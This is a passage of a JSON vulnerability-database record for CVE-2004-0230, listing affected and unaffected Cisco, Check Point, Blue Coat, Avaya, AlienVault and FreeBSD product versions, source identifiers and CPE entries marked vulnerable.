            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29006.1(3)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29006.1(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29005.5(7)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29005.5(6)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29004.5(12)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "29004.5(11)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2900"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2820"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2800"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1900"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1200"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3(3)"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1(2)"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5704.1"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5704.0"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5703.0"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5702.2.0"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "570"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5054.1"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5054.0"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5053.0"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5052.2.0"
          },
          {
            "_id": null,
            "model": "cache engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "505"
          },
          {
            "_id": null,
            "model": "br350",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "br340",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bpx/igx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "bpx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8600"
          },
          {
            "_id": null,
            "model": "bpx",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ap350",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ap340",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "wan switch",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8950"
          },
          {
            "_id": null,
            "model": "broadband network termination unit",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8110"
          },
          {
            "_id": null,
            "model": "point software vpn-1 vsx ng with application intelligence",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 next generation fp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 next generation fp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 next generation fp0",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software vpn-1 sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1 sp5a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1 sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1 sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1 sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1 sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1 sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software vpn-1 fp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software secureplatform ng fp2 edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "2"
          },
          {
            "_id": null,
            "model": "point software secureplatform ng fp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software secureplatform ng fp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software secureplatform ng",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software firewall-1 vsx ng with application intelligence",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software firewall-1 next generation fp2",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software firewall-1 next generation fp1",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software firewall-1 next generation fp0",
            "scope": null,
            "trust": 0.3,
            "vendor": "check",
            "version": null
          },
          {
            "_id": null,
            "model": "point software firewall-1 gx",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 [ vpn des ]",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "+4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 [ vpn des strong ] sp2 build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "++4.141716"
          },
          {
            "_id": null,
            "model": "point software firewall-1 [ vpn des strong ] build",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "++4.141439"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp5a",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp8",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp7",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1 sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "point software firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "check",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "coat systems security gateway os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "3.1.2"
          },
          {
            "_id": null,
            "model": "coat systems security gateway os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "coat systems security gateway os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "coat systems security gateway os sp1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "2.1.5001"
          },
          {
            "_id": null,
            "model": "coat systems security gateway os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "2.1.10"
          },
          {
            "_id": null,
            "model": "coat systems security gateway os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "2.1.9"
          },
          {
            "_id": null,
            "model": "coat systems security gateway os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "coat systems cacheos ca/sa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.1.12"
          },
          {
            "_id": null,
            "model": "coat systems cacheos ca/sa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "blue",
            "version": "4.1.10"
          },
          {
            "_id": null,
            "model": "modular messaging",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "intuity audix r5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "_id": null,
            "model": "cms r17 r3",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "cms r17",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "cms r16 r6",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "cms r16 r5",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "cms r16",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "5.0.4"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.15.2"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.15.1"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.15"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.14"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.13"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.12.1"
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "4.12"
          },
          {
            "_id": null,
            "model": "network data loss prevention",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "mcafee",
            "version": "9.3"
          },
          {
            "_id": null,
            "model": "9.3-stable",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.3-release-p2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.2-release-p12",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "9.1-release-p19",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-stable",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "8.4-release-p16",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.1-prerelease",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.1-beta1-p1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "10.0-release-p9",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3080"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3060"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3030"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3015"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30054.0.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30054.0"
          },
          {
            "_id": null,
            "model": "vpn concentrator f",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator c",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator b",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator a",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.5"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30053.6.3"
          },
          {
            "_id": null,
            "model": "vpn hardware client",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3002"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.0.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.0.x"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30004.0"
          },
          {
            "_id": null,
            "model": "vpn concentrator d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6.7"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.6"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.5"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.4"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.3"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.2"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.5"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.1.4"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.1.2"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.1.1"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.0.4"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30003.0"
          },
          {
            "_id": null,
            "model": "vpn concentrator",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "30002.0"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.3.3(133)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.2.3(110)"
          },
          {
            "_id": null,
            "model": "pix firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6.1.5(104)"
          },
          {
            "_id": null,
            "model": "ons optical transport platform",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.14"
          },
          {
            "_id": null,
            "model": "ons",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "153274.14"
          },
          {
            "_id": null,
            "model": "mds",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90001.3"
          },
          {
            "_id": null,
            "model": "local director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(6)"
          },
          {
            "_id": null,
            "model": "local director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(5)"
          },
          {
            "_id": null,
            "model": "local director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(4)"
          },
          {
            "_id": null,
            "model": "local director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(3)"
          },
          {
            "_id": null,
            "model": "local director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(2)"
          },
          {
            "_id": null,
            "model": "local director",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2(1)"
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.3(6)"
          },
          {
            "_id": null,
            "model": "ios 12.2ja",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.2(23)"
          },
          {
            "_id": null,
            "model": "ios 12.2 s",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios 12.0 xn1",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "ios",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "12.0(28)"
          },
          {
            "_id": null,
            "model": "ios 12.0 s",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "_id": null,
            "model": "fwsm for cisco catalyst series",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6500/76001.1(3.17)"
          },
          {
            "_id": null,
            "model": "fwsm for cisco catalyst series",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "6500/7600"
          },
          {
            "_id": null,
            "model": "css11500 content services switch s",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "_id": null,
            "model": "catalyst series ssl services module",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "65002.1(2)"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "28209.00.07"
          },
          {
            "_id": null,
            "model": "catalyst",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "19009.00.07"
          },
          {
            "_id": null,
            "model": "cms r17 r4",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "cms r16.3 r7",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "_id": null,
            "model": "alienvault",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "alienvault",
            "version": "5.1"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#415294"
          },
          {
            "db": "BID",
            "id": "10183"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200408-159"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2004-000150"
          },
          {
            "db": "NVD",
            "id": "CVE-2004-0230"
          }
        ]
      },
      "configurations": {
        "_id": null,
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:ibm:aix",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:netbsd:netbsd",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:allied_telesis_k.k.:router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:oracle:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:channel_interface_processor",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:channel_port_adapter",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:8110_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:access_registrar",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:aironet",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:aironet_ap340",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:application_and_content_networking_system_software",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:ata-180",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:bpx_switch_8600",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:cache_engine",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:call_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_1200",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_1900",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_2800",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_2820",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_2900",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_3000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_3900",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_4000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_5000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:catalyst_6000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:content_delivery_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:content_distribution_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:content_engine",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:content_router",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:content_switching_module",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:css_11000",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:css_11500",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:element_management_framework",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:fasthub_300",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:fasthub_400",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:firewall_services_module",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:gss_global_site_selector",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:cisco:igx_8400",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:info_center",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:intelligent_contact_manager",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:cisco:internet_cdn_solution",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:ios",
